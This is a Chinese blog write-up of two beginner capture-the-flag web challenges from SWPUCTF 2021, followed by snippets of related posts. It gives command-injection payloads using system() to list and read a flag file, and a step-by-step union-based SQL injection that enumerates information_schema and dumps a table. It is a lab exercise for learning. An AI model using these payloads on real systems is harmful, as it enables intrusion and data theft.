[SWPUCTF 2021 新生赛]easyrce
打开题以后发现这个界面,需要构造url的值,然后就想起来看一下目录
?url=system("ls /");注意:ls后面要有一个空格,然后一个分号结束,这不就出来了flag
1: ?url=system("cat /f*");
2\?url=system("cat /flllllaaaaaaggggggg");
[SWPUCTF 2021 新生赛]easy_sql
打开界面属实给我整不会了。
1.然后测一下是否存在sql漏洞,因为题目中说了参数是wllm,首先输入一下?wllm=1回显正常,然后试一下?wllm=1'然后出现错误,所以判断存在字符型漏洞,
2.测试一下字段列数,?wllm=1' order by 3--+,?wllm=1' order by 4--+出错所以为三列
3. ?wllm=1' union select 1,database(),3 --+ 看一下回显位置顺便查询数据库名称,结果却一直不对,我想了半天才发现wllm=-1'这样前面肯定错误才会往后面走,记住就行了,然后查出来数据库名称是
4.进行下一部查询表, ?wllm=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='test_db' --+
5.猜测flag在test_tb这个表里面
?wllm=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='test_db' and table_name='test_tb' --+
6.最后出现flag,然后?wllm=-1’ union select 1,database(),flag from test_tb --+或者?wllm=-1' union select 1,flag,3 from test_tb --+
就得出了答案Your Login name:NSSCTF{17cff774-19ac-4227-bb53-29e6e97ca767}
[SWPUCTF 2021 新生赛]easyrce相关推荐
- [SWPUCTF 2021 新生赛]第一波放题(nssctf刷题)
[SWPUCTF 2021 新生赛]jicao json_decode介绍: json_decode (PHP 5 >= 5.2.0, PECL json >= 1.2.0) json_d ...
- [SWPUCTF 2021 新生赛]babyrce
打开界面看见if选项admin=1果断想到用burp抓包然后cookie给admin=1,获取下一步指令 然后url访问, <?php error_reporting(0); highligh ...
- [SWPUCTF 2021 新生赛]
[SWPUCTF 2021 新生赛]jicao 进入环境: <?php highlight_file('index.php'); include("flag.php"); $ ...
- CTF笔记 [SWPUCTF 2021 新生赛]pop
文章目录 一些常见魔术方法 [SWPUCTF 2021 新生赛]pop 总结 这一类题目比较考验对一段代码的逻辑方面的理解,通过利用魔数方法进行互相调用,形成一条链子,利用这条链子将对象联系起来去拿f ...
- [SWPUCTF 2021 新生赛] 第三波放题
[SWPUCTF 2021 新生赛]easyupload3.0 首先弄个报错出来,随便弄一下,比如弄出一个not found页面,发现是Apache/2.4.7 (Ubuntu) ,既然是 Apach ...
- [SWPUCTF 2021 新生赛]PseudoProtocols
[SWPUCTF 2021 新生赛]PseudoProtocols 一.题目 二.WP 1.打开题目,发现提示我们是否能找到hint.php,并且发现URL有参数wllm.所以我们尝试利用PHP伪协议 ...
- [SWPUCTF 2021 新生赛]no_wakeup
[SWPUCTF 2021 新生赛]no_wakeup 考点 反序列化 一.题目 打开题目发现如下代码 <?phpheader("Content-type:text/html;char ...
- [SWPUCTF] 2021新生赛之Crypto篇刷题记录(11)
[SWPUCTF] 2021新生赛之Crypto篇刷题记录① [SWPUCTF 2021 新生赛]crypto6 [SWPUCTF 2021 新生赛]ez_caesar [SWPUCTF 2021 新 ...
- [SWPUCTF 2021 新生赛]caidao
看到这个界面,直接用蚁剑连接,密码是wllm. 找到根目录,flag就在/flag中
最新文章
- 苹果手机视频传输教程-通过无线将电脑上视频传到手机
- shell脚本实现无密码交互的SSH自动登陆
- Bootstrap-模态框 modal.js
- 乱骑共享单车?黑名单见!
- python初学 数据分叉情况下的函数递归
- python向excel写数据_Python向excel中写入数据的方法
- 网易云课堂测试微专业前置课
- nvidia显卡linux 7.2,科学网—悲喜录:服务器 CentOS 7.2 安装Nvidia显卡驱动(64bit) - 袁伟的博文...
- hdu-1173(最短距离)
- 建模年纪大了怎么办,建模是吃青春饭的嘛?
- DeepFool笔记:对原理的理解和公式推导(多分类)
- 【转载】TinyXML2使用教程
- iOS完全免费的4个APP,良心安利!谁说便宜没好货
- 卟啉试剂cas40904-90-3/四-(2-吡啶基)卟啉/TPyP(2);氯乙酰基氧基(CLP1-5);锌卟啉-富勒烯配合物(p-OCH3)ZnP-C60]
- 解构金蝶EAS 开发工具
- 计算机快捷键m是什么,电脑常用快捷键有哪些
- 淘宝打不开的解决办法
- 软件设计师:计算机硬件基础
- MySQL——数据库读写分离原理
- 微信小程序getuserinfo废弃